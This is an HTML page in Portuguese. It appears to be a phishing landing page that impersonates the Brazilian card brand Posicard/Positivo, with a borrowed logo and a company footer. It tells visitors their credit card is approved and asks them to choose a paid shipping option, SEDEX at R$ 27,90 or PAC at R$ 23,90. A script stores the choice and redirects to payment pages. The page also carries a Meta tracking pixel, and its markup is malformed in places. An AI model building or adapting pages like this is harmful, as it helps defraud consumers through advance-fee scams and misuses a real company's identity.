<!DOCTYPE html><html lang="pt-BR"><head>
    <meta charset="UTF-8">
    <link href="css/QVbDds1ZAEr9.css" rel="stylesheet">
    <meta name="viewport" content="width=device-width,initial-scale=1">
    <style>
        .header {
            background: radial-gradient(934px at 6% 39.5%, rgb(0, 173, 202) 0.2%, rgb(0, 73, 144) 54.8%, rgb(250, 99, 160) 93.4%);
            color: white;
            padding: 15px 0;
            text-align: center;
            font-size: 1.5rem;
            font-weight: bold;
            grid-area: top-bar;
        }

        .main-content {
            max-width: 450px;
            background-color: white;
            text-align: center;
            padding: 2rem 2rem 1rem 2rem;
            border-radius: 10px;
            box-shadow: 0 2px 40px rgba(0, 0, 0, 0.1);
            margin: 0 auto;
        }

        .main-content h2 {
            margin-bottom: 20px;
        }

        .btn-custom {
            color: white;
            border: none;
            width: 100%;
            margin-bottom: 10px;
            background: radial-gradient(934px at 6% 39.5%, rgb(0, 173, 202) 0.2%, rgb(0, 73, 144) 54.8%, rgb(255, 0, 0) 93.4%);
            font-weight: 600;
            border-radius: 1rem;
            padding: .75rem 3rem;
            letter-spacing: .3px;
            line-height: 1.15;
        }

        .btn-custom:hover {
            color: black !important;
            background-color: #00adca !important;
            transform: scale(1.02) !important;
        }

        .footer {
            background-color: #ffffff;
            border-top: solid 1px #e6dddd;
            color: #000;
            text-align: center;
            width: 100%;
            bottom: 0;
            grid-area: footer;
            border-bottom: solid 3px #e6007e;
            padding: 2rem 0.5rem;
            position: relative;
            margin-top: 50px;
        }

        #conclusao {
            display: none;
            /* Esconde o elemento por padrão */
        }

        #conclusao h4 {
            color: green;
            /* Define a cor do texto */
            font-weight: bold;
            /* Define o texto em negrito */
        }

        .char {
            border-top: solid px #00adca;
            background-color: #00adca;
            padding: 2px !important;
        }

        /* End custom CSS */
    </style>
    

    <!-- Meta Pixel Code -->
<script>
    !function(f,b,e,v,n,t,s)
    {if(f.fbq)return;n=f.fbq=function(){n.callMethod?
    n.callMethod.apply(n,arguments):n.queue.push(arguments)};
    if(!f._fbq)f._fbq=n;n.push=n;n.loaded=!0;n.version='2.0';
    n.queue=[];t=b.createElement(e);t.async=!0;
    t.src=v;s=b.getElementsByTagName(e)[0];
    s.parentNode.insertBefore(t,s)}(window, document,'script',
    'https://connect.facebook.net/en_US/fbevents.js');
    fbq('init', '1249577276382820');
    fbq('track', 'PageView');
    fbq('track', 'ViewContent');
    </script>
    <noscript><img height="1" width="1" style="display:none"
    src="https://www.facebook.com/tr?id=1249577276382820&ev=PageView&noscript=1"
    /></noscript>
    <!-- End Meta Pixel Code -->


    
</head>

<body>
    <div style="
  display: grid;
  grid-template-areas:
    'top-bar'
    'content'
    'footer';
  grid-template-rows: auto 1fr auto;
  min-height: 100vh;
">
        <div class="header">
            <img decoding="async" style="width: 120px;" src="images/xFsNg5JbkstU.png" alt="Imagem Centralizada" data-lazy-src="https://d9hhrg4mnvzow.cloudfront.net/lp.posicard.com.br/834c63b6-logo-branco2_105e038000000000000000.png" data-ll-status="loaded" class="entered lazyloaded"><noscript><img decoding="async" style="width: 120px;" src="https://d9hhrg4mnvzow.cloudfront.net/lp.posicard.com.br/834c63b6-logo-branco2_105e038000000000000000.png" alt="Imagem Centralizada"></noscript>
        </div>

        <div style="grid-area: content; padding: 0 1rem;">
            <div style="margin-top: 18px;" class="main-content text-center">
                <strong <h5="">Agora basta escolher uma forma de envio do seu Cartão de Crédito APROVADO
        
        </strong>
                <div id="opcoes-envio" class="mb-3"><strong <h5="">
            <!-- Opção SEDEX -->
            </strong>
                    <div class="card-opcao mb-3 selecionado" onclick="selecionarOpcao('sedex')"><strong <h5="">
                </strong>
                        <div class="d-flex justify-content-between align-items-center"><strong <h5="">
                    <div>
            <h5 style="color: #00adca; margin-bottom: 0;">SEDEX</h5>

                        <small>1-2 dias úteis</small>
                    </div>
                    </strong>
                            <div><strong <h5="">
                        <strong<h5 style="color: #00adca; margin-bottom: 0;">R$ 27,90
</strong<h5></strong>
                            </div>
                        </div>
                    </div>

                    <!-- Opção PAC -->
                    <div class="card-opcao mb-3" onclick="selecionarOpcao('pac')">
                        <div class="d-flex justify-content-between align-items-center">
                            <div>
                                <h5 class="text-muted mb-0">PAC</h5>
                                <small class="text-muted">4 dias úteis</small>
                            </div>
                            <div>
                                <strong<h5 class="text-muted mb-0">R$ 23,90
                                </strong<h5>
                            </div>
                        </div>
                    </div>
                    <script defer="" src="https://static.cloudflareinsights.com/beacon.min.js/vcd15cbe7772f49c399c6a5babf22c1241717689176015" data-cf-beacon="{&quot;rayId&quot;:&quot;8b919c1bae711a8c&quot;,&quot;serverTiming&quot;:{&quot;name&quot;:{&quot;cfL4&quot;:true}},&quot;version&quot;:&quot;2024.8.0&quot;,&quot;token&quot;:&quot;cabb363b6d114d1caa03acfc303d668f&quot;}" crossorigin="anonymous"></script>
                </div>

                <button type="submit" id="continuarEnvio" class=" btn-custom w-100 rounded-pill">Continuar</button>
            </div>
        </div>

        <script>
            let opcaoSelecionada = null;

            function selecionarOpcao(opcao) {
                opcaoSelecionada = opcao;

                // Remove a classe 'selecionado' de todas as opções
                document.querySelectorAll('.card-opcao').forEach(function(card) {
                    card.classList.remove('selecionado');
                });

                // Adiciona a classe 'selecionado' à opção clicada
                document.querySelector(`.card-opcao[onclick="selecionarOpcao('${opcao}')"]`).classList.add('selecionado');

                // Habilita o botão de continuar
                document.getElementById('continuarEnvio').disabled = false;
            }

            document.getElementById('continuarEnvio').addEventListener('click', function() {
                if (opcaoSelecionada) {
                    localStorage.setItem('freteEscolhido', opcaoSelecionada);
                    if (opcaoSelecionada === 'sedex') {
                        window.location.href = '../type-sedex/index.html';
                    } else {
                        window.location.href = '../type-pac/index.html';
                    }
                }
            });
        </script>

        <style>
            .card-opcao {
                padding: 15px;
                border: 2px solid #ccc;
                border-radius: 10px;
                cursor: pointer;
            }

            .card-opcao.selecionado {
                border-color: #00adca;
                background-color: rgba(253, 228, 241, 0 10.0);
            }

            .text-pink {
                color: #e6007e;
            }
        </style>

        <div class="footer py-4" id="footerChg">
            © 2024 Positivo Brasil. CNPJ 36.401.269/0001-27. <br> Todos os direitos reservados
        </div>

    </div>
</body></html>